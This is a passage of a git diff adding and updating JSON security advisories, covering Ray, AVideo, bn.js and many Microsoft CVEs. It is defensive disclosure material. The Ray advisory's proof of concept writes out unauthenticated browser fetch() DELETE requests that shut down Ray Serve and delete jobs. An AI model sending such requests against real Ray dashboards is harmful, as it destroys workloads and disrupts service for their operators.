"references": [ + { + "type": "WEB", + "url": "https://github.com/traefik/traefik/security/advisories/GHSA-gv8r-9rw9-9697" + }, + { + "type": "PACKAGE", + "url": "https://github.com/traefik/traefik" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1395" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:14:27Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json b/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json new file mode 100644 index 0000000000000..0ee743fdace27 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q5fh-2hc8-f6rq", + "modified": "2026-02-20T21:15:26Z", + "published": "2026-02-20T21:15:25Z", + "aliases": [ + "CVE-2026-27482" + ], + "summary": "Ray dashboard DELETE endpoints allow unauthenticated browser-triggered DoS (Serve shutdown / job deletion)", + "details": "### Summary\n\n Ray’s dashboard HTTP server blocks browser-origin POST/PUT but does not cover DELETE, and key DELETE endpoints are unauthenticated by default. If the dashboard/agent is reachable (e.g., --dashboard-host=0.0.0.0), a web page via DNS rebinding or same-network access can\n issue DELETE requests that shut down Serve or delete jobs without user interaction. This is a drive-by availability impact.\n\n ### Details\n\n - Middleware: python/ray/dashboard/http_server_head.py#get_browsers_no_post_put_middleware only checks POST/PUT via is_browser_request (UA/Origin/Sec-Fetch heuristics). DELETE is not gated.\n - Endpoints lacking browser protection/auth by default:\n - python/ray/dashboard/modules/serve/serve_head.py: @routes.delete(\"/api/serve/applications/\") calls serve.shutdown().\n - python/ray/dashboard/modules/job/job_head.py: @routes.delete(\"/api/jobs/{job_or_submission_id}\").\n - python/ray/dashboard/modules/job/job_agent.py: @routes.delete(\"/api/job_agent/jobs/{job_or_submission_id}\") (not wrapped with deny_browser_requests either).\n - Dashboard token auth is optional and off by default; binding to 0.0.0.0 is common for remote access.\n\n ### PoC\n\n Prereqs: dashboard reachable (e.g., ray start --head --dashboard-host=0.0.0.0), no token auth.\n\n 1. Start Serve (or have jobs present).\n 2. From any browser-reachable origin (DNS rebinding or same-LAN page), issue a DELETE fetch:\n\n``` \nfetch(\"http://:8265/api/serve/applications/\", {\n method: \"DELETE\",\n headers: { \"User-Agent\": \"Mozilla/5.0\" } // browsers set this automatically\n });\n```\n\n Result: Serve shuts down.\n 3) Similarly, delete jobs:\n\n ` fetch(\"http://:8265/api/jobs/\", { method: \"DELETE\" });`\n ` fetch(\"http://:52365/api/job_agent/jobs/\", { method: \"DELETE\" });`\n\n Browsers will send the Mozilla UA and Origin/Sec-Fetch headers, but DELETE is not blocked by the middleware, so the requests succeed.\n\n ### Impact\n\n - Availability loss: Serve shutdown; job deletion. Triggerable via drive-by browser requests if the dashboard/agent ports are reachable and auth is disabled (default).\n - No code execution from this vector, but breaks isolation/trust assumptions for “developer-only” endpoints.\n \n### Fix\nThe fix for this vulnerability is to update to Ray 2.54.0 or higher. \n\nFix PR: https://github.com/ray-project/ray/pull/60526", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ray" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.54.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ray-project/ray/security/advisories/GHSA-q5fh-2hc8-f6rq" + }, + { + "type": "WEB", + "url": "https://github.com/ray-project/ray/pull/60526" + }, + { + "type": "WEB", + "url": "https://github.com/ray-project/ray/commit/0fda8b824cdc9dc6edd763bb28dfd7d1cc9b02a4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ray-project/ray" + }, + { + "type": "WEB", + "url": "https://github.com/ray-project/ray/releases/tag/ray-2.54.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:15:25Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-rcqw-6466-3mv7/GHSA-rcqw-6466-3mv7.json b/advisories/github-reviewed/2026/02/GHSA-rcqw-6466-3mv7/GHSA-rcqw-6466-3mv7.json new file mode 100644 index 0000000000000..6119066e10708 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-rcqw-6466-3mv7/GHSA-rcqw-6466-3mv7.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rcqw-6466-3mv7", + "modified": "2026-02-20T21:15:06Z", + "published": "2026-02-20T21:15:06Z", + "aliases": [ + "CVE-2026-27568" + ], + "summary": "AVideo has Stored Cross-Site Scripting via Markdown Comment Injection", + "details": "## Vulnerability Type\nStored Cross-Site Scripting (XSS) — CWE-79.\n\n## Affected Product/Versions\nAVideo 18.0.\n\n## Root Cause Summary\nAVideo allows Markdown in video comments and uses Parsedown (v1.7.4) without Safe Mode enabled. Markdown links are not sufficiently sanitized, allowing `javascript:` URIs to be rendered as clickable links.\n\n## Impact Summary\nAn authenticated low-privilege attacker can post a malicious comment that injects persistent JavaScript. When another user clicks the link, the attacker can perform actions such as session hijacking, privilege escalation (including admin takeover), and data exfiltration.\n\n## Resolution/Fix\nThe issue was confirmed and fixed in the master branch. An official release will be published soon.\n\n## Workarounds\nUntil the release is available, validate and block unsafe URI schemes (e.g., `javascript:`) before rendering Markdown, and enable Parsedown Safe Mode.\n\n## Credits/Acknowledgement\nReported by Arkadiusz Marta (https://github.com/arkmarta/).", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "wwbn/avideo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "21.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-rcqw-6466-3mv7" + }, + { + "type": "WEB", + "url": "https://github.com/WWBN/AVideo/commit/ade348ed6d28b3797162c3d9e98054fb09ec51d7" + }, + { + "type": "PACKAGE", + "url": "https://github.com/WWBN/AVideo" + }, + { + "type": "WEB", + "url": "https://github.com/WWBN/AVideo/releases/tag/21.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:15:06Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json b/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json deleted file mode 100644 index e7ae460c93780..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json +++ /dev/null @@ -1,33 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9jmq-xgjm-p8c2", - "modified": "2026-02-20T18:31:33Z", - "published": "2026-02-20T18:31:33Z", - "aliases": [ - "CVE-2025-67438" - ], - "details": "A Stored Cross-Site Scripting (XSS) vulnerability in Sync-in Server before 1.9.3 allows an authenticated attacker to execute arbitrary JavaScript in a victim's browser. By uploading a crafted SVG file containing a malicious payload, an attacker can access and exfiltrate sensitive information, including the user's session cookies.", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67438" - }, - { - "type": "WEB", - "url": "https://gist.github.com/x0root/86db30af91bb0e1707eb7e57a049b6ad" - }, - { - "type": "WEB", - "url": "https://github.com/Sync-in/server/releases/tag/v1.9.3" - } - ], - "database_specific": { - "cwe_ids": [], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-20T16:22:02Z" - } -} \ No newline at end of file From 15ca7925626eaa5195a38a82f516657e3fe1a541 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:20:36 +0000 Subject: [PATCH 24/77] Publish GHSA-378v-28hj-76wf --- .../GHSA-378v-28hj-76wf.json | 39 ++++++++++++++++--- 1 file changed, 34 insertions(+), 5 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json (67%) diff --git a/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json similarity index 67% rename from advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json rename to advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json index b195f365c2995..a03ceb51fe956 100644 --- a/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json +++ b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-378v-28hj-76wf", - "modified": "2026-02-20T06:30:39Z", + "modified": "2026-02-20T21:18:31Z", "published": "2026-02-20T06:30:39Z", "aliases": [ "CVE-2026-2739" ], + "summary": "bn.js affected by an infinite loop", "details": "This affects versions of the package bn.js before 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.", "severity": [ { @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "bn.js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.2.3" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -43,6 +64,14 @@ "type": "WEB", "url": "https://gist.github.com/Kr0emer/02370d18328c28b5dd7f9ac880d22a91" }, + { + "type": "PACKAGE", + "url": "https://github.com/indutny/bn.js" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/releases/tag/v5.2.3" + }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-BNJS-15274301" @@ -53,8 +82,8 @@ "CWE-835" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:18:31Z", "nvd_published_at": "2026-02-20T05:17:53Z" } } \ No newline at end of file From f9abce7787ec8d3759c8b7eadda46dc4abe8e82f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:33:00 +0000 Subject: [PATCH 25/77] Advisory Database Sync --- .../GHSA-2h53-ffj5-hg3q.json | 13 +++- .../GHSA-2m99-pq2j-5j4f.json | 13 +++- .../GHSA-2r32-rq8q-r57h.json | 13 +++- .../GHSA-32j3-hv3j-q9qq.json | 9 ++- .../GHSA-373m-h49w-9x43.json | 9 ++- .../GHSA-4x8m-3wcx-gv8x.json | 9 ++- .../GHSA-534v-m7q8-9qgf.json | 13 +++- .../GHSA-5qmr-w63r-99q4.json | 13 +++- .../GHSA-78g9-438v-4f34.json | 9 ++- .../GHSA-78hr-8953-5gh6.json | 9 ++- .../GHSA-7j76-3f62-vcf8.json | 9 ++- .../GHSA-7x73-763j-hw4v.json | 13 +++- .../GHSA-89v5-wvp7-3m8g.json | 9 ++- .../GHSA-974f-9h45-g4v4.json | 13 +++- .../GHSA-9j6q-fhff-rr4p.json | 13 +++- .../GHSA-c2cv-vhh7-5wqr.json | 13 +++- .../GHSA-c2qm-98hf-mh5x.json | 9 ++- .../GHSA-ggpr-x33h-6668.json | 13 +++- .../GHSA-gj34-2m5p-98wq.json | 9 ++- .../GHSA-j4m7-8245-9345.json | 9 ++- .../GHSA-j5jh-cv7m-3763.json | 9 ++- .../GHSA-j5p2-jf5p-h3rm.json | 9 ++- .../GHSA-m3wq-w5qf-gpqg.json | 13 +++- .../GHSA-mhjc-pqhq-cf8c.json | 9 ++- .../GHSA-p5w8-9jhp-rccp.json | 13 +++- .../GHSA-qcg4-w26w-fjv8.json | 9 ++- .../GHSA-qvf2-39c6-g8rr.json | 9 ++- .../GHSA-qxww-2h29-62jj.json | 9 ++- .../GHSA-r62x-fmfh-f3x7.json | 13 +++- .../GHSA-rq2v-5grq-h5mc.json | 9 ++- .../GHSA-vmp9-r9rc-8gc7.json | 9 ++- .../GHSA-vw2q-fc9j-fxwx.json | 13 +++- .../GHSA-vw3c-3fmq-qpgq.json | 9 ++- .../GHSA-w8p3-q4q6-xq79.json | 9 ++- .../GHSA-wqw7-2chg-rhcv.json | 9 ++- .../GHSA-xhpj-r5xj-f4j3.json | 13 +++- .../GHSA-g5c7-69g3-565r.json | 2 +- .../GHSA-ghpw-cph8-v3rm.json | 13 +++- .../GHSA-qqrg-hpxx-mmvw.json | 6 +- .../GHSA-2vf2-f656-c2mm.json | 6 +- .../GHSA-52xc-q9g5-mc6m.json | 6 +- .../GHSA-56jh-3q9p-9x3q.json | 6 +- .../GHSA-rhrj-763h-99fq.json | 6 +- .../GHSA-343f-9rcg-8p42.json | 11 +++- .../GHSA-3685-fgwv-ffhc.json | 56 +++++++++++++++++ .../GHSA-3822-8jq8-pqhh.json | 11 +++- .../GHSA-3g7r-h8fj-xc5g.json | 11 +++- .../GHSA-43ww-vg8r-97hv.json | 11 +++- .../GHSA-5fgx-x2mx-c652.json | 3 +- .../GHSA-5mq8-87c9-qfhc.json | 56 +++++++++++++++++ .../GHSA-5vrw-6f4h-227q.json | 6 +- .../GHSA-5xcj-44v8-p2v3.json | 3 +- .../GHSA-6262-6vhm-9x8v.json | 11 +++- .../GHSA-62hw-x3qq-c7vv.json | 6 +- .../GHSA-68g8-2724-hq79.json | 36 +++++++++++ .../GHSA-6wwj-pg79-rf37.json | 3 +- .../GHSA-79pg-4mv3-p2x9.json | 56 +++++++++++++++++ .../GHSA-7qvf-m2xc-hg57.json | 11 +++- .../GHSA-7vm8-ccqm-97q2.json | 36 +++++++++++ .../GHSA-86qm-25mg-cp7q.json | 60 +++++++++++++++++++ .../GHSA-87jc-9r3r-58w8.json | 6 +- .../GHSA-c49j-5m2h-224g.json | 11 +++- .../GHSA-cgwr-5223-r4pg.json | 4 +- .../GHSA-cq5p-w4x6-m6h3.json | 3 +- .../GHSA-fgjg-x2hx-m8rf.json | 44 ++++++++++++++ .../GHSA-fr87-mwgv-wmcc.json | 11 +++- .../GHSA-gfrr-w669-mfpw.json | 6 +- .../GHSA-gmmc-3vpq-7m4c.json | 11 +++- .../GHSA-h8h3-mqvc-hwrf.json | 11 +++- .../GHSA-h9gf-cpg2-x9mv.json | 56 +++++++++++++++++ .../GHSA-hc23-qvrh-v59g.json | 11 +++- .../GHSA-m23x-mm6q-4qg4.json | 11 +++- .../GHSA-mj9g-3f37-7qv2.json | 11 +++- .../GHSA-mjjq-x58m-rfxp.json | 3 +- .../GHSA-mv55-hjp6-qw4c.json | 44 ++++++++++++++ .../GHSA-pg4q-7rh5-52c9.json | 6 +- .../GHSA-pmgj-wpmq-6xx5.json | 11 +++- .../GHSA-qv8j-hgpc-vrq8.json | 36 +++++++++++ .../GHSA-r4m3-cm43-fxrj.json | 6 +- .../GHSA-r62q-p7vv-vh53.json | 56 +++++++++++++++++ .../GHSA-v754-wvf3-33xx.json | 11 +++- .../GHSA-v859-79r4-4vv5.json | 11 +++- .../GHSA-vmwq-q997-3c46.json | 11 +++- .../GHSA-w246-2vcp-75v8.json | 6 +- .../GHSA-wh2j-26j7-9728.json | 36 +++++++++++ .../GHSA-wrqv-46c5-q67w.json | 11 +++- .../GHSA-x57h-c6qr-3m4q.json | 11 +++- .../GHSA-xpp8-qpcr-c3rg.json | 6 +- 88 files changed, 1111 insertions(+), 166 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-3685-fgwv-ffhc/GHSA-3685-fgwv-ffhc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5mq8-87c9-qfhc/GHSA-5mq8-87c9-qfhc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-68g8-2724-hq79/GHSA-68g8-2724-hq79.json create mode 100644 advisories/unreviewed/2026/02/GHSA-79pg-4mv3-p2x9/GHSA-79pg-4mv3-p2x9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7vm8-ccqm-97q2/GHSA-7vm8-ccqm-97q2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-86qm-25mg-cp7q/GHSA-86qm-25mg-cp7q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fgjg-x2hx-m8rf/GHSA-fgjg-x2hx-m8rf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h9gf-cpg2-x9mv/GHSA-h9gf-cpg2-x9mv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mv55-hjp6-qw4c/GHSA-mv55-hjp6-qw4c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json diff --git a/advisories/unreviewed/2022/05/GHSA-2h53-ffj5-hg3q/GHSA-2h53-ffj5-hg3q.json b/advisories/unreviewed/2022/05/GHSA-2h53-ffj5-hg3q/GHSA-2h53-ffj5-hg3q.json index 59f7a1233280b..cb507822ca3ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-2h53-ffj5-hg3q/GHSA-2h53-ffj5-hg3q.json +++ b/advisories/unreviewed/2022/05/GHSA-2h53-ffj5-hg3q/GHSA-2h53-ffj5-hg3q.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2h53-ffj5-hg3q", - "modified": "2022-05-24T16:53:33Z", + "modified": "2026-02-20T21:31:10Z", "published": "2022-05-24T16:53:33Z", "aliases": [ "CVE-2019-1199" ], "details": "A remote code execution vulnerability exists in Microsoft Outlook when the software fails to properly handle objects in memory, aka 'Microsoft Outlook Memory Corruption Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2m99-pq2j-5j4f/GHSA-2m99-pq2j-5j4f.json b/advisories/unreviewed/2022/05/GHSA-2m99-pq2j-5j4f/GHSA-2m99-pq2j-5j4f.json index 9234288b95566..ee16e8b27a531 100644 --- a/advisories/unreviewed/2022/05/GHSA-2m99-pq2j-5j4f/GHSA-2m99-pq2j-5j4f.json +++ b/advisories/unreviewed/2022/05/GHSA-2m99-pq2j-5j4f/GHSA-2m99-pq2j-5j4f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2m99-pq2j-5j4f", - "modified": "2022-05-24T16:53:28Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:28Z", "aliases": [ "CVE-2019-1145" ], "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1144, CVE-2019-1149, CVE-2019-1150, CVE-2019-1151, CVE-2019-1152.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-119" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2r32-rq8q-r57h/GHSA-2r32-rq8q-r57h.json b/advisories/unreviewed/2022/05/GHSA-2r32-rq8q-r57h/GHSA-2r32-rq8q-r57h.json index fe1dcd8fd126f..c0f26dd1b6a0c 100644 --- a/advisories/unreviewed/2022/05/GHSA-2r32-rq8q-r57h/GHSA-2r32-rq8q-r57h.json +++ b/advisories/unreviewed/2022/05/GHSA-2r32-rq8q-r57h/GHSA-2r32-rq8q-r57h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2r32-rq8q-r57h", - "modified": "2022-05-24T16:53:29Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:29Z", "aliases": [ "CVE-2019-1152" ], "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1144, CVE-2019-1145, CVE-2019-1149, CVE-2019-1150, CVE-2019-1151.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-32j3-hv3j-q9qq/GHSA-32j3-hv3j-q9qq.json b/advisories/unreviewed/2022/05/GHSA-32j3-hv3j-q9qq/GHSA-32j3-hv3j-q9qq.json index 740d81a9ca786..a72190c558577 100644 --- a/advisories/unreviewed/2022/05/GHSA-32j3-hv3j-q9qq/GHSA-32j3-hv3j-q9qq.json +++ b/advisories/unreviewed/2022/05/GHSA-32j3-hv3j-q9qq/GHSA-32j3-hv3j-q9qq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-32j3-hv3j-q9qq", - "modified": "2022-05-24T16:53:30Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:30Z", "aliases": [ "CVE-2019-1161" ], "details": "An elevation of privilege vulnerability exists when the MpSigStub.exe for Defender allows file deletion in arbitrary locations.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Defender Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-373m-h49w-9x43/GHSA-373m-h49w-9x43.json b/advisories/unreviewed/2022/05/GHSA-373m-h49w-9x43/GHSA-373m-h49w-9x43.json index 819260249df62..f59b5664e5a3c 100644 --- a/advisories/unreviewed/2022/05/GHSA-373m-h49w-9x43/GHSA-373m-h49w-9x43.json +++ b/advisories/unreviewed/2022/05/GHSA-373m-h49w-9x43/GHSA-373m-h49w-9x43.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-373m-h49w-9x43", - "modified": "2022-05-24T16:53:29Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:29Z", "aliases": [ "CVE-2019-1147" ], "details": "A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1146, CVE-2019-1155, CVE-2019-1156, CVE-2019-1157.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-4x8m-3wcx-gv8x/GHSA-4x8m-3wcx-gv8x.json b/advisories/unreviewed/2022/05/GHSA-4x8m-3wcx-gv8x/GHSA-4x8m-3wcx-gv8x.json index 19c7b9acd5f35..1477b080be437 100644 --- a/advisories/unreviewed/2022/05/GHSA-4x8m-3wcx-gv8x/GHSA-4x8m-3wcx-gv8x.json +++ b/advisories/unreviewed/2022/05/GHSA-4x8m-3wcx-gv8x/GHSA-4x8m-3wcx-gv8x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4x8m-3wcx-gv8x", - "modified": "2022-05-24T16:53:30Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:30Z", "aliases": [ "CVE-2019-1169" ], "details": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-534v-m7q8-9qgf/GHSA-534v-m7q8-9qgf.json b/advisories/unreviewed/2022/05/GHSA-534v-m7q8-9qgf/GHSA-534v-m7q8-9qgf.json index c0b20a6068f89..6d08e65c39e89 100644 --- a/advisories/unreviewed/2022/05/GHSA-534v-m7q8-9qgf/GHSA-534v-m7q8-9qgf.json +++ b/advisories/unreviewed/2022/05/GHSA-534v-m7q8-9qgf/GHSA-534v-m7q8-9qgf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-534v-m7q8-9qgf", - "modified": "2022-05-24T16:53:34Z", + "modified": "2026-02-20T21:31:11Z", "published": "2022-05-24T16:53:34Z", "aliases": [ "CVE-2019-1206" ], "details": "A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server, aka 'Windows DHCP Server Denial of Service Vulnerability'. This CVE ID is unique from CVE-2019-1212.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5qmr-w63r-99q4/GHSA-5qmr-w63r-99q4.json b/advisories/unreviewed/2022/05/GHSA-5qmr-w63r-99q4/GHSA-5qmr-w63r-99q4.json index 16781b30626c2..53e73738adc5c 100644 --- a/advisories/unreviewed/2022/05/GHSA-5qmr-w63r-99q4/GHSA-5qmr-w63r-99q4.json +++ b/advisories/unreviewed/2022/05/GHSA-5qmr-w63r-99q4/GHSA-5qmr-w63r-99q4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5qmr-w63r-99q4", - "modified": "2022-05-24T16:53:33Z", + "modified": "2026-02-20T21:31:10Z", "published": "2022-05-24T16:53:33Z", "aliases": [ "CVE-2019-1192" ], "details": "A security feature bypass vulnerability exists when Microsoft browsers improperly handle requests of different origins, aka 'Microsoft Browsers Security Feature Bypass Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-863" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-78g9-438v-4f34/GHSA-78g9-438v-4f34.json b/advisories/unreviewed/2022/05/GHSA-78g9-438v-4f34/GHSA-78g9-438v-4f34.json index 3be4080f6f3af..f25fb8773a1d2 100644 --- a/advisories/unreviewed/2022/05/GHSA-78g9-438v-4f34/GHSA-78g9-438v-4f34.json +++ b/advisories/unreviewed/2022/05/GHSA-78g9-438v-4f34/GHSA-78g9-438v-4f34.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-78g9-438v-4f34", - "modified": "2022-05-24T16:53:34Z", + "modified": "2026-02-20T21:31:11Z", "published": "2022-05-24T16:53:34Z", "aliases": [ "CVE-2019-1211" ], "details": "An elevation of privilege vulnerability exists in Git for Visual Studio when it improperly parses configuration files, aka 'Git for Visual Studio Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-78hr-8953-5gh6/GHSA-78hr-8953-5gh6.json 